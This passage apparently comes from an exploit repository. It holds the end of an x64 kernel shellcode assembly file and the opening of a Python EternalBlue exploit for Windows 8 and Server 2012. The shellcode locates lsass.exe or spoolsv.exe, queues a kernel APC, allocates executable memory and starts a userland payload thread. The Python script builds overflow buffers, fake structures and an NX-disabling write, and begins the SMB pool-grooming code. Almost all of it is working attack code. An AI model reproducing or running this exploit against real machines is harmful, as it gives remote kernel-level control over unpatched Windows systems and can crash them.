232 |     ; if offset of ImageFilename is more than 0x400, current is (Win8+)
233 | %ifdef WIN7
234 |     lea rdx, [rax+0x28]
235 | %elifdef WIN8
236 |     lea rdx, [rax+0x38]
237 | %else
238 |     cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
239 |     jb _find_eprocess_threadlist_offset_win7
240 |     add eax, 0x10
241 | _find_eprocess_threadlist_offset_win7:
242 |     lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
243 | %endif
244 | 
245 |     
246 |     ;======================================
247 |     ; find offset of ETHREAD.ThreadListEntry
248 |     ;======================================
249 | %ifdef COMPACT
250 |     lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
251 | %else
252 |     lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
253 |     mov r9, r8
254 | %endif
255 |     ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
256 | _find_ethread_threadlist_offset_loop:
257 |     mov r9, qword [r9]
258 | %ifndef COMPACT
259 |     cmp r8, r9          ; check end of list
260 |     je _insert_queue_apc_done    ; not found !!!
261 | %endif
262 |     ; if (r9 - r14 < 0x700) found
263 |     mov rax, r9
264 |     sub rax, r14
265 |     cmp rax, 0x700
266 |     ja _find_ethread_threadlist_offset_loop
267 |     sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)
268 | 
269 | 
270 |     ;======================================
271 |     ; find offset of EPROCESS.ActiveProcessLinks
272 |     ;======================================
273 |     mov edi, PSGETPROCESSID_HASH
274 |     call get_proc_addr
275 |     mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
276 |     add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
277 |     
278 | 
279 |     ;======================================
280 |     ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
281 |     ;======================================
282 |     ; check process name
283 | _find_target_process_loop:
284 |     lea rsi, [rcx+rbx]
285 |     call calc_hash
286 |     cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
287 | %ifndef COMPACT
288 |     jz found_target_process
289 |     cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
290 | %endif
291 |     jz found_target_process
292 |     ; next process
293 |     mov rcx, [rcx+rdi]
294 |     sub rcx, rdi
295 |     jmp _find_target_process_loop
296 | 
297 | 
298 | found_target_process:
299 |     ; The allocation for userland payload will be in KernelApcRoutine.
300 |     ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
301 | 
302 |     ;======================================
303 |     ; save process PEB for finding CreateThread address in kernel KAPC routine
304 |     ;======================================
305 |     mov edi, PSGETPROCESSPEB_HASH
306 |     ; rcx is EPROCESS. no need to set it.
307 |     call win_api_direct
308 |     mov [rbp+DATA_PEB_ADDR_OFFSET], rax
309 |     
310 |     
311 |     ;======================================
312 |     ; iterate ThreadList until KeInsertQueueApc() success
313 |     ;======================================
314 |     ; r15 = nt
315 |     ; r14 = -(offset of ETHREAD.ThreadListEntry)
316 |     ; rcx = EPROCESS
317 |     ; edx = offset of EPROCESS.ThreadListHead
318 | 
319 | %ifdef COMPACT
320 |     lea rbx, [rcx + rdx]
321 | %else
322 |     lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
323 |     mov rbx, rsi    ; use rbx for iterating thread
324 | %endif
325 | 
326 | 
327 |     ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
328 |     ; Moreover, alertable thread need to be waiting state which is more difficult to check.
329 |     ; try queueing APC then check KAPC member is more reliable.
330 | 
331 | _insert_queue_apc_loop:
332 |     ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
333 |     mov rbx, [rbx+8]
334 | %ifndef COMPACT
335 |     cmp rsi, rbx
336 |     je _insert_queue_apc_loop   ; skip list head
337 | %endif
338 | 
339 |     ; find start of ETHREAD address
340 |     ; set it to rdx to be used for KeInitializeApc() argument too
341 |     lea rdx, [rbx + r14]    ; ETHREAD
342 |     
343 |     ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
344 |     ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
345 |     ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
346 |     ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
347 |     ; Teb member is next to Queue member.
348 |     mov edi, PSGETTHREADTEB_HASH
349 |     call get_proc_addr
350 |     mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
351 |     cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
352 |     je _insert_queue_apc_loop
353 |     
354 |     ; KeInitializeApc(PKAPC,
355 |     ;                 PKTHREAD,
356 |     ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
357 |     ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
358 |     ;                 PKRUNDOWN_ROUTINE = NULL,
359 |     ;                 PKNORMAL_ROUTINE = userland_shellcode,
360 |     ;                 KPROCESSOR_MODE = UserMode (1),
361 |     ;                 PVOID Context);
362 |     lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
363 |     xor r8, r8      ; OriginalApcEnvironment
364 |     lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
365 |     push rbp    ; context
366 |     push 1      ; UserMode
367 |     push rbp    ; userland shellcode (MUST NOT be NULL)
368 |     push r8     ; NULL
369 |     sub rsp, 0x20   ; shadow stack
370 |     mov edi, KEINITIALIZEAPC_HASH
371 |     call win_api_direct
372 |     ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
373 | 
374 |     ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
375 |     ;   SystemArgument1 is second argument in usermode code (rdx)
376 |     ;   SystemArgument2 is third argument in usermode code (r8)
377 |     lea rcx, [rbp+DATA_KAPC_OFFSET]
378 |     ;xor edx, edx   ; no need to set it here
379 |     ;xor r8, r8     ; no need to set it here
380 |     xor r9, r9
381 |     mov edi, KEINSERTQUEUEAPC_HASH
382 |     call win_api_direct
383 |     add rsp, 0x40
384 |     ; if insertion failed, try next thread
385 |     test eax, eax
386 |     jz _insert_queue_apc_loop
387 |     
388 |     mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
389 |     ; EPROCESS pointer 8 bytes
390 |     ; InProgressFlags 1 byte
391 |     ; KernelApcPending 1 byte
392 |     ; if success, UserApcPending MUST be 1
393 |     cmp byte [rax+0x1a], 1
394 |     je _insert_queue_apc_done
395 |     
396 |     ; manual remove list without lock
397 |     mov [rax], rax
398 |     mov [rax+8], rax
399 |     jmp _insert_queue_apc_loop
400 | 
401 | _insert_queue_apc_done:
402 |     ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
403 | 
404 | _r3_to_r0_done:
405 |     pop rax
406 |     pop rbx
407 |     pop rsi
408 |     pop rdi
409 |     pop r14
410 |     pop r15
411 |     ret
412 | 
413 | ;========================================================================
414 | ; Call function in specific module
415 | ; 
416 | ; All function arguments are passed as calling normal function with extra register arguments
417 | ; Extra Arguments: r15 = module pointer
418 | ;                  edi = hash of target function name
419 | ;========================================================================
420 | win_api_direct:
421 |     call get_proc_addr
422 |     jmp rax
423 | 
424 | 
425 | ;========================================================================
426 | ; Get function address in specific module
427 | ; 
428 | ; Arguments: r15 = module pointer
429 | ;            edi = hash of target function name
430 | ; Return: eax = offset
431 | ;========================================================================
432 | get_proc_addr:
433 |     ; Save registers
434 |     push rbx
435 |     push rcx
436 |     push rsi                ; for using calc_hash
437 | 
438 |     ; use rax to find EAT
439 |     mov eax, dword [r15+60]  ; Get PE header e_lfanew
440 |     mov eax, dword [r15+rax+136] ; Get export tables RVA
441 | 
442 |     add rax, r15
443 |     push rax                 ; save EAT
444 | 
445 |     mov ecx, dword [rax+24]  ; NumberOfFunctions
446 |     mov ebx, dword [rax+32]  ; FunctionNames
447 |     add rbx, r15
448 | 
449 | _get_proc_addr_get_next_func:
450 |     ; When we reach the start of the EAT (we search backwards), we hang or crash
451 |     dec ecx                     ; decrement NumberOfFunctions
452 |     mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
453 |     add rsi, r15                ; Add the modules base address
454 | 
455 |     call calc_hash
456 | 
457 |     cmp eax, edi                        ; Compare the hashes
458 |     jnz _get_proc_addr_get_next_func    ; try the next function
459 | 
460 | _get_proc_addr_finish:
461 |     pop rax                     ; restore EAT
462 |     mov ebx, dword [rax+36]
463 |     add rbx, r15                ; ordinate table virtual address
464 |     mov cx, word [rbx+rcx*2]    ; desired functions ordinal
465 |     mov ebx, dword [rax+28]     ; Get the function addresses table rva
466 |     add rbx, r15                ; Add the modules base address
467 |     mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
468 |     add rax, r15                ; Add the modules base address to get the functions actual VA
469 | 
470 |     pop rsi
471 |     pop rcx
472 |     pop rbx
473 |     ret
474 | 
475 | ;========================================================================
476 | ; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
477 | ; 
478 | ; Argument: rsi = string to hash
479 | ; Clobber: rsi
480 | ; Return: eax = hash
481 | ;========================================================================
482 | calc_hash:
483 |     push rdx
484 |     xor eax, eax
485 |     cdq
486 | _calc_hash_loop:
487 |     lodsb                   ; Read in the next byte of the ASCII string
488 |     ror edx, 13             ; Rotate right our hash value
489 |     add edx, eax            ; Add the next byte of the string
490 |     test eax, eax           ; Stop when found NULL
491 |     jne _calc_hash_loop
492 |     xchg edx, eax
493 |     pop rdx
494 |     ret
495 | 
496 | 
497 | ; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
498 | ; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
499 | ; Moreover, there is no lock when calling KernelApcRoutine.
500 | ; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
501 | ;
502 | ; VOID KernelApcRoutine(
503 | ;           IN PKAPC Apc,
504 | ;           IN PKNORMAL_ROUTINE *NormalRoutine,
505 | ;           IN PVOID *NormalContext,
506 | ;           IN PVOID *SystemArgument1,
507 | ;           IN PVOID *SystemArgument2)
508 | kernel_kapc_routine:
509 |     push rbp
510 |     push rbx
511 |     push rdi
512 |     push rsi
513 |     push r15
514 |     
515 |     mov rbp, [r8]       ; *NormalContext is our data area pointer
516 |         
517 |     mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
518 |     push rdx
519 |     pop rsi     ; mov rsi, rdx
520 |     mov rbx, r9
521 |     
522 |     ;======================================
523 |     ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
524 |     ;======================================
525 |     xor eax, eax
526 |     mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
527 |     ; rdx is already address of baseAddr
528 |     mov [rdx], rax      ; baseAddr = 0
529 |     mov ecx, eax
530 |     not rcx             ; ProcessHandle = -1
531 |     mov r8, rax         ; ZeroBits
532 |     mov al, 0x40    ; eax = 0x40
533 |     push rax            ; PAGE_EXECUTE_READWRITE = 0x40
534 |     shl eax, 6      ; eax = 0x40 << 6 = 0x1000
535 |     push rax            ; MEM_COMMIT = 0x1000
536 |     ; reuse r9 for address of RegionSize
537 |     mov [r9], rax       ; RegionSize = 0x1000
538 |     sub rsp, 0x20   ; shadow stack
539 |     mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
540 |     call win_api_direct
541 |     add rsp, 0x30
542 | %ifndef COMPACT
543 |     ; check error
544 |     test eax, eax
545 |     jnz _kernel_kapc_routine_exit
546 | %endif
547 |     
548 |     ;======================================
549 |     ; copy userland payload
550 |     ;======================================
551 |     mov rdi, [rsi]
552 |     lea rsi, [rel userland_start]
553 |     mov ecx, 0x600  ; fix payload size to 1536 bytes
554 |     rep movsb
555 |     
556 |     ;======================================
557 |     ; find CreateThread address (in kernel32.dll)
558 |     ;======================================
559 |     mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
560 |     mov rax, [rax + 0x18]       ; PEB->Ldr
561 |     mov rax, [rax + 0x20]       ; InMemoryOrder list
562 | 
563 | %ifdef COMPACT
564 |     mov rsi, [rax]      ; first one always be executable, skip it
565 |     lodsq               ; skip ntdll.dll
566 | %else
567 | _find_kernel32_dll_loop:
568 |     mov rax, [rax]       ; first one always be executable
569 |     ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
570 |     ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
571 |     ; offset 0x50  => is name
572 |     ; offset 0x20  => is dllbase
573 |     ;cmp word [rax+0x38], 0x40
574 |     ;jne _find_kernel32_dll_loop
575 |     cmp word [rax+0x48], 0x18
576 |     jne _find_kernel32_dll_loop
577 |     
578 |     mov rdx, [rax+0x50]
579 |     ; check only "32" because name might be lowercase or uppercase
580 |     cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
581 |     jnz _find_kernel32_dll_loop
582 | %endif
583 | 
584 |     mov r15, [rax+0x20]
585 |     mov edi, CREATETHREAD_HASH
586 |     call get_proc_addr
587 | 
588 |     ; save CreateThread address to SystemArgument1
589 |     mov [rbx], rax
590 |     
591 | _kernel_kapc_routine_exit:
592 |     xor ecx, ecx
593 |     ; clear queueing kapc flag, allow other hijacked system call to run shellcode
594 |     mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
595 |     ; restore IRQL to APC_LEVEL
596 |     mov cl, 1
597 |     mov cr8, rcx
598 |     
599 |     pop r15
600 |     pop rsi
601 |     pop rdi
602 |     pop rbx
603 |     pop rbp
604 |     ret
605 | 
606 |   
607 | userland_start:
608 | userland_start_thread:
609 |     ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
610 |     xchg rdx, rax   ; rdx is CreateThread address passed from kernel
611 |     xor ecx, ecx    ; lpThreadAttributes = NULL
612 |     push rcx        ; lpThreadId = NULL
613 |     push rcx        ; dwCreationFlags = 0
614 |     mov r9, rcx     ; lpParameter = NULL
615 |     lea r8, [rel userland_payload]  ; lpStartAddr
616 |     mov edx, ecx    ; dwStackSize = 0
617 |     sub rsp, 0x20
618 |     call rax
619 |     add rsp, 0x30
620 |     ret
621 |     
622 | userland_payload:


--------------------------------------------------------------------------------
/eternalblue_exploit8.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | from impacket import smb, ntlm
  3 | from struct import pack
  4 | import sys
  5 | import socket
  6 | 
  7 | '''
  8 | EternalBlue exploit for Windows 8 and 2012 by sleepya
  9 | The exploit might FAIL and CRASH a target system (depended on what is overwritten)
 10 | The exploit support only x64 target
 11 | 
 12 | Tested on:
 13 | - Windows 2012 R2 x64
 14 | - Windows 8.1 x64
 15 | 
 16 | 
 17 | Default Windows 8 and later installation without additional service info:
 18 | - anonymous is not allowed to access any share (including IPC$)
 19 |   - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows
 20 | - tcp port 445 is filtered by firewall
 21 | 
 22 | 
 23 | Reference:
 24 | - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
 25 | - "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit
 26 | 
 27 | 
 28 | Exploit info:
 29 | - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at
 30 |     https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same
 31 | - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).
 32 |     On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.
 33 | - The exploit is likely to crash a target when it failed
 34 | - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.
 35 | - If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)
 36 | - See the code and comment for exploit detail.
 37 | 
 38 | 
 39 | Disable NX method:
 40 | - The idea is from "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" (see link in reference)
 41 | - The exploit is also the same but we need to trigger bug twice
 42 | - First trigger, set MDL.MappedSystemVa to target pte address
 43 |   - Write '\x00' to disable the NX flag
 44 | - Second trigger, do the same as Windows 7 exploit
 45 | - From my test, if exploit disable NX successfully, I always get code execution
 46 | '''
 47 | 
 48 | # if anonymous can access any share folder, 'IPC$' is always accessible.
 49 | # authenticated user is always able to access 'IPC$'.
 50 | # Windows 2012 does not allow anonymous to login if no share is accessible.
 51 | USERNAME=''
 52 | PASSWORD=''
 53 | 
 54 | # because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000
 55 | NTFEA_SIZE = 0x9000
 56 | 
 57 | ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260  # with these fea, ntfea size is 0x1c80
 58 | ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'*0x735d  # 0x8fe8 - 0x1c80 - 0xc = 0x735c
 59 | ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'*0x8148  # overflow to SRVNET_BUFFER_HDR
 60 | 
 61 | '''
 62 | Reverse from srvnet.sys (Win2012 R2 x64)
 63 | - SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():
 64 | 
 65 | // size 0x90
 66 | struct SRVNET_BUFFER_HDR {
 67 | 	LIST_ENTRY list;
 68 | 	USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.
 69 | 	char unknown0[6];
 70 | 	char *pNetRawBuffer;  // MUST point to valid address (check if this request is "\xfdSMB")
 71 | 	DWORD netRawBufferSize; // offset: 0x20
 72 | 	DWORD ioStatusInfo;
 73 | 	DWORD thisNonPagedPoolSize;  // will be 0x82e8 for netRawBufferSize 0x8100
 74 | 	DWORD pad2;
 75 | 	char *thisNonPagedPoolAddr; // 0x30  points to SRVNET_BUFFER
 76 | 	PMDL pmdl1; // point at offset 0x90 from this struct
 77 | 	DWORD nByteProcessed; // 0x40
 78 | 	char unknown4[4];
 79 | 	QWORD smbMsgSize; // MUST be modified to size of all recv data
 80 | 	PMDL pmdl2; // 0x50:  if want to free corrupted buffer, need to set to valid address
 81 | 	QWORD pSrvNetWskStruct;  // want to change to fake struct address
 82 | 	DWORD unknown6; // 0x60
 83 | 	char unknown7[12];
 84 | 	char unknown8[0x20];
 85 | };
 86 | 
 87 | struct SRVNET_BUFFER {
 88 | 	char transportHeader[80]; // 0x50
 89 | 	char buffer[reqSize+padding];  // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)
 90 | 	SRVNET_BUFFER_HDR hdr; //some header size 0x90
 91 | 	//MDL mdl1; // target
 92 | };
 93 | 
 94 | In Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.
 95 | Because transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and 
 96 |   DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.
 97 | So the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.
 98 | If exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.
 99 | '''
100 | # Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing
101 | # Here is the important fields on x64
102 | # - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is
103 | #                           a check in SrvNetWskTransformedReceiveComplete() if this message starts with "\xfdSMB".
104 | # - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).
105 | #                           This value MUST be exactly same as the number of bytes we send.
106 | #                           Normally, this value is 0x80 + len(fake_struct) + len(shellcode)
107 | # - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.
108 | #                           The value MUST point to valid (might be fake) struct.
109 | # - offset 0x90 (MDL)   : MDL for describe receiving SMB request buffer
110 | #   - 0x90 (VOID*)    : MDL.Next should be NULL
111 | #   - 0x98 (USHORT)   : MDL.Size should be some value that not too small
112 | #   - 0x9a (USHORT)   : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)
113 | #   - 0x90 (VOID*)    : MDL.Process should be NULL
114 | #   - 0x98 (VOID*)    : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.
115 | #                         The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).
116 | #                         
117 | #
118 | # To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.
119 | # Here is related field for freeing corrupted buffer
120 | # - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0
121 | # - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()
122 | # - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0
123 | #                           before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to
124 | #                           your shellcode as function argument
125 | # - offset 0x50 (PMDL)  : points to any fake MDL with MDL.Flags 0x20 does not set
126 | # The last condition is your shellcode MUST return non-negative value. The easiest way to do is "xor eax,eax" before "ret".
127 | # Here is x64 assembly code for setting nByteProcessed field
128 | # - fetch SRVNET_BUFFER address from function argument
129 | #     \x48\x8b\x54\x24\x40  mov rdx, [rsp+0x40]
130 | # - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)
131 | #     \x48\x01\xd1          add rcx, rdx
132 | #     \x48\x89\x4a\x30      mov [rdx+0x30], rcx
133 | # - set nByteProcessed for trigger free after return
134 | #     \x8b\x4a\x48          mov ecx, [rdx+0x48]
135 | #     \x89\x4a\x40          mov [rdx+0x40], ecx
136 | 
137 | # debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.
138 | # The 0xffffffffffd00000 address should be useable when debug mode is not enabled
139 | # The 0xffffffffffd01000 address should be useable when debug mode is enabled
140 | TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000  # for put fake struct and shellcode
141 |  
142 | # Note: feaList will be created after knowing shellcode size.
143 | 
144 | # feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa
145 | # PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800
146 | # NX bit is at PTE_ADDR+7
147 | # MappedSystemVa = PTE_ADDR+7 - 0x7f
148 | SHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000
149 | PTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)
150 | fakeSrvNetBufferX64Nx = '\x00'*16
151 | fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)
152 | fakeSrvNetBufferX64Nx += '\x00'*16
153 | fakeSrvNetBufferX64Nx += '\x00'*16
154 | fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
155 | fakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR)  # _, _, pointer to fake struct
156 | fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
157 | fakeSrvNetBufferX64Nx += '\x00'*16
158 | fakeSrvNetBufferX64Nx += '\x00'*16
159 | fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
160 | fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f)  # MDL.Process, MDL.MappedSystemVa
161 | 
162 | feaListNx = pack('<I', 0x10000)
163 | feaListNx += ntfea9000
164 | feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\x00' is for name
165 | # stop copying by invalid flag (can be any value except 0 and 0x80)
166 | feaListNx += pack('<BBH', 0x12, 0x34, 0x5678)
167 | 
168 | 
169 | def createFakeSrvNetBuffer(sc_size):
170 | 	# 0x180 is size of fakeSrvNetBufferX64
171 | 	totalRecvSize = 0x80 + 0x180 + sc_size
172 | 	fakeSrvNetBufferX64 = '\x00'*16
173 | 	fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)  # flag, _, _, pNetRawBuffer
174 | 	fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0)  # _, thisNonPagedPoolSize, _
175 | 	fakeSrvNetBufferX64 += '\x00'*16
176 | 	fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize)  # offset 0x40
177 | 	fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR)  # pmdl2, pointer to fake struct
178 | 	fakeSrvNetBufferX64 += pack('<QQ', 0, 0)
179 | 	fakeSrvNetBufferX64 += '\x00'*16
180 | 	fakeSrvNetBufferX64 += '\x00'*16
181 | 	fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
182 | 	fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80)  # MDL.Process, MDL.MappedSystemVa
183 | 	return fakeSrvNetBufferX64
184 | 
185 | def createFeaList(sc_size):
186 | 	feaList = pack('<I', 0x10000)
187 | 	feaList += ntfea9000
188 | 	fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)
189 | 	feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\x00' is for name
190 | 	# stop copying by invalid flag (can be any value except 0 and 0x80)
191 | 	feaList += pack('<BBH', 0x12, 0x34, 0x5678)
192 | 	return feaList
193 | 
194 | # fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()
195 | # x64: fake struct is at ffffffff ffd00e00
196 | #   offset 0x50:  KSPIN_LOCK
197 | #   offset 0x58:  LIST_ENTRY must be valid address. cannot be NULL.
198 | #   offset 0x110: array of pointer to function
199 | #   offset 0x13c: set to 3 (DWORD) for invoking ptr to function
200 | # some useful offset
201 | #   offset 0x120: arg1 when invoking ptr to function
202 | #   offset 0x128: arg2 when invoking ptr to function
203 | #
204 | # code path to get code exection after this struct is controlled
205 | # SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr
206 | fake_recv_struct = ('\x00'*16)*5
207 | fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58)  # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)
208 | fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0)  # offset 0x60
209 | fake_recv_struct += ('\x00'*16)*10
210 | fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0)  # offset 0x110: fn_ptr array
211 | fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0)  # set arg1 to -0x8150
212 | fake_recv_struct += pack('<QII', 0, 0, 3)  # offset 0x130
213 | fake_recv_struct += ('\x00'*16)*3
214 | fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)  # shellcode address
215 | 
216 | 
217 | def getNTStatus(self):
218 | 	return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
219 | setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
220 | 
221 | def sendEcho(conn, tid, data):
222 | 	pkt = smb.NewSMBPacket()
223 | 	pkt['Tid'] = tid
224 | 
225 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
226 | 	transCommand['Parameters'] = smb.SMBEcho_Parameters()
227 | 	transCommand['Data'] = smb.SMBEcho_Data()
228 | 
229 | 	transCommand['Parameters']['EchoCount'] = 1
230 | 	transCommand['Data']['Data'] = data
231 | 	pkt.addCommand(transCommand)
232 | 
233 | 	conn.sendSMB(pkt)
234 | 	recvPkt = conn.recvSMB()
235 | 	if recvPkt.getNTStatus() == 0:
236 | 		print('got good ECHO response')
237 | 	else:
238 | 		print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
239 | 
240 | 
241 | # override SMB.neg_session() to allow forcing ntlm authentication
242 | class MYSMB(smb.SMB):
243 | 	def __init__(self, remote_host, use_ntlmv2=True):
244 | 		self.__use_ntlmv2 = use_ntlmv2
245 | 		smb.SMB.__init__(self, remote_host, remote_host)
246 | 
247 | 	def neg_session(self, extended_security = True, negPacket = None):
248 | 		smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
249 | 
250 | def createSessionAllocNonPaged(target, size):
251 | 	conn = MYSMB(target, use_ntlmv2=False)  # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
252 | 	_, flags2 = conn.get_flags()
253 | 	# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
254 | 	if size >= 0xffff:
255 | 		flags2 &= ~smb.SMB.FLAGS2_UNICODE
256 | 		reqSize = size // 2
257 | 	else:
258 | 		flags2 |= smb.SMB.FLAGS2_UNICODE
259 | 		reqSize = size
260 | 	conn.set_flags(flags2=flags2)
261 | 	
262 | 	pkt = smb.NewSMBPacket()
263 | 
264 | 	sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
